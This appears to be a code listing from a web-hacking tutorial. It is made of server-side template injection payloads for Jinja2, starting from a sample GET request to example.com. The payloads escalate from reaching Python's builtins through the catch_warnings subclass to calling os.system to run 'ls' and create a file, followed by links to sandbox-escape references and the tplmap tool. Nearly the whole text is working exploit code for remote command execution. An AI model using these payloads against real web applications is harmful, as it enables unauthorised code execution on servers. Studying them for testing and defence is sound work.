# GET /display_name?name="{{[].__class__.__bases__[0].__subclasses__()}}"
# Host: example.com

{% for x in [].__class__.__bases__[0].__subclasses__() %}

{% if 'catch_warnings' in x.__name__ %}

{{x()._module.__builtins__}}

{%endif%}
{%endfor%}


{% for x in [].__class__.__bases__[0].__subclasses__() %}

{% if 'catch_warnings' in x.__name__ %}

{{x()._module.__builtins__['__import__']}}

{%endif%}
{%endfor%}


{% for x in [].__class__.__bases__[0].__subclasses__() %}

{% if 'catch_warnings' in x.__name__ %}

{{x()._module.__builtins__['__import__']('os').system('ls')}}

{%endif%}
{%endfor%}


{% for x in [].__class__.__bases__[0].__subclasses__() %}
{% if 'warning' in x.__name__ %}
{{x()._module.__builtins__['__import__']('os').system('touch template_injection_by_vickie
.txt')}}
{%endif%}
{%endfor%}

•bCTF Wiki, https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/
python-sandbox-escape/

•	 HackTricks, https://book.hacktricks.xyz/misc/basic-python/
bypass-python-sandboxes/

•	 Programmer Help, https://programmer.help/blogs/python-sandbox-escape.html

# https://github.com/epinna/tplmap/
